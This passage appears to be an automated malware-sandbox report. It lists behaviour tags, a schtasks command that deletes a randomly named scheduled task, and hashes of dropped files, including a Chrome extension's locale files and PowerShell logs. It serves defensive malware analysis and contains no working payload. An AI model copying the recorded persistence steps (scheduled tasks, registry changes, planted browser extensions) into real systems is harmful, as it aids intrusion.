- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3200 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rrUPsTjgSYBWMUseO"3⤵PID:2036
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
2KB
MD5c1e617ee90be2be03fe3652d70291c44
SHA16267f4fe53ada6af161b5b5cfb1611a84cbaa275
SHA256d2bc2f6d16ea68188f350b6ac0a2bccc40bfa10ff07082efdb7623cbc3d1ab62
SHA51297a2f6d21ed2e70b4dc20cb0c3182ece32bbbbd3548786f35b3606f4f9cefc03833ab409c0d48e2568b2eb1a48b6eb7bf755893ae40a68f5819b233aafe43068
-
Filesize
2KB
MD578d5e8592592304aac50a83044e5f6d7
SHA17218a9b28dd121eb3dd751fec687cac5878ed0a5
SHA2562f082e13726085170757c4354bd66b932e66a456515cc82d2ee94dbb99f7d12a
SHA51263579ae414d2aa58013075ce3b32b73403565f644be02317af7873813c2f32118fc43cea660a6c21f4711389a7101776f3c04d8d0896c89df7005a7f5fb6aff1
-
Filesize
2KB
MD5532011c0ca38b9d43ea3a720ef6b0926
SHA11e3198ffdff34c81b3b174ef62912bd1a08ae9f2
SHA2562cd215c1777ac16d105439d756e5e640540c00cb2f435ffac0d1577cc50366e7
SHA5123442fcb26889647a397600594e9f6a4b1f6353b100a9ed493d67a8a127a11b521000702cbf0b251416860884d4c9341790ac4dec0e0dd26e3dd9023f495e4f94
-
Filesize
2KB
MD5b7d2893f8579af476d4b44b216ac3ee0
SHA11e1767496e7edae42c39cf52a99e4a54bf5d420b
SHA256cde2aae57bd457b678ed1ddb5329810ca744c7d639b2f56ded3cc62dd2747d21
SHA512056070c7efad1bba4900f074ea58af898a1c5269b33f00f6801214bd335f4e2ddbedde1bfb85208e7bc5bde1d7a3b9ca73c96aaafc6a7777653cf4c021f838ab
-
Filesize
2.5MB
MD5cc0f3e92343cf34c4e6e6e3c1eedbdaf
SHA141258a5cd74ca7bc1575e2642b94a1a496c03564
SHA25609296f19dc57ede878f19044d96a8224a4ab0fff2fd8735233251ac171923d4e
SHA512cce6a1eec2ef558de93636ffae17832d87885b6f1033a78e31d7ec250c4e8cf095fc3e557741bdc10e1e28a385deed5fd70a8c0432113f63fb436c33cd550a61
-
Filesize
2KB
MD54959e5b7c72d6313ed6e8a042f63ba09
SHA1bfab646240217685755a8b531ea65c0aaa96dd42
SHA2561fa12e7595e45caa0ab4c371ade703cc9c3140a2b0f801ad3ce417ba34e5f10f
SHA512f247f2298a6ac64b52153797bb60fc2e545647085aa062c9063a9813a52e2d9134b278b5b222c8def4ecb5753cafdaa9f886305119f428e1d1267bddd6079d03
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD57522cc3bed8310c9785990f3696a55ce
SHA1984ef600e84ed853ec44f364818b590bb83184e4
SHA25691ccd0aa08846846affbb3d932f8faace6e6795d4fee786c204cc548a84b913d
SHA51256db07b81aa5262bb9c5e89d5580b9172149a98f0328ddcbed940e829370bb179c24951ddece771d66400eb68e1f2f903041bf3e72169950c18e24d9349ba484
-
Filesize
12KB
MD54a7fa3ef3c6424e133f8403a38254b89
SHA1b8e0bdfa6a66ceee0708c7695ee38f80e6734096
SHA256ffec31673fe9f461ae9cab2653ed24551d64560e340d25082509a8fefeae9978
SHA512991cf62a8325d73adca17f0e93b79a4943542f5f9e3ff70ca40c9dc37e2a9fc67cf495ac5c54742f21e4b367e03b412bcd97f47f19f8382e9d465953fe12ecfe
-
Filesize
6.4MB
MD52cf2337e9e6403960884bdb45a7c31e7
SHA1fd93fc8f2b048d1cc5aa3f285089f0b057e09bc3
SHA2564eb719601baae4bf6dee847cc591d2edda7f7aa60ab65e6699db770b5ea982f9
SHA512dc78483aa79c965db83e703788d55cd836372ae63627dfb27e817f20440e4873be6c8ba2c9116f5e480117bec61e0140f63993f5d0aa7265fb497bd52cb5b58e
-
Filesize
6.7MB
MD54a6234985179c24fab6e1ca0c926d8b7
SHA153e1858155418e1c0b163bfc796af17c20f9293d
SHA2565d451382e517894f68583cd635aa094378c963c2fd67517d2d1466807da4e41e
SHA5125916a7c4d9ed751cb7a494ab8b3444a59c635b2768bb2d395b8917b306cc07b66206d2ccf4b784ca4afdf0edce1b1f2c1ca6365d480cb42aaf40492770b3c6de
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
6KB
MD563c77e15249d2cb354abf9579acb35b7
SHA1e70bcd2a91d4474e6fcdc6fdf2c433a84659d0ef
SHA2568eeb4f08a43e2e0e66437d101cb1c9e0c6bcba73c7fbd0a681d3fa60bee7c5c2
SHA51279d9a5d677e027965fc908d071ca8055e4aebbe87120c0686678c968f4123f79f983058089bfb7e14aef83ab4672228653805d058b3d4c13c8b76e60f29ab558
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD5e33ed3d4cc9b2e5a08ae25747ef47620
SHA1e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7
SHA2560e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f
SHA5129e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5dfbb9bcce28823b1c398ef156b600951
SHA10fd84e89ff996838229d724fc0f522b15908d5b5
SHA256d652cd6c5b67bd0ae16ee62bc37d7c03345aff11d2f9247bdb221398671252d9
SHA512505e11bf1cc872fefd89e81fa7d4aef19df66496854c1f6af1aea674acd9eb2352e7f3808510c94bfe975240d0e5f49688105db844502fa00eea568a5061553d
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5e9d50d5b14a0b8b5a20b291e27203e74
SHA1713dbad5bdccf82d772550f75b76555bba02be36
SHA2565c3a26d8bdd98496726403f9a52cbc34c0ce9122941792e3fa99237a020ed1db
SHA512c98f71b1cbde5018b7c886c6e8458f1915b49827f75c02d3e522c8ce0cb10c0065c1dbd35eae87ed710dec43c8baf58b7cb702e7a6801f7a471c305495826876
-
Filesize
6.5MB
MD50adf6200e5ae41efdcb874ef6c181c18
SHA13d65aeb9d1411f437aaa3a34218327a2d8503860
SHA25625e86744bd0c1402446e21fe0729f19dfb3b865a6d0e4ce597f3d5793ef75ea1
SHA51253efdd8cc69c145b38af00a5ceaa0a7b3f102966f95f967a879a71dd750aae86786c5a85e50111176bc363f57a6453aebe06a34df87a23730c1b1f76d9df7107
-
Filesize
6KB
MD5f45b3592609f5f523f8bc379a255096d
SHA1075a893e18500869f4305c704a56d7eb094d7030
SHA25647fc846266f5ddde27d536e84efb8555acd768fb3e0ff3381314c68278d9a8da
SHA5122d18e07d0da7da5ca5d8b474e8816d6f5e8bcf9303f06c8177ff428c975185e00b3ff1289d1747b21f536bc028c5b61cf2b1e401a838eb2a20a7bb7f1c2b3042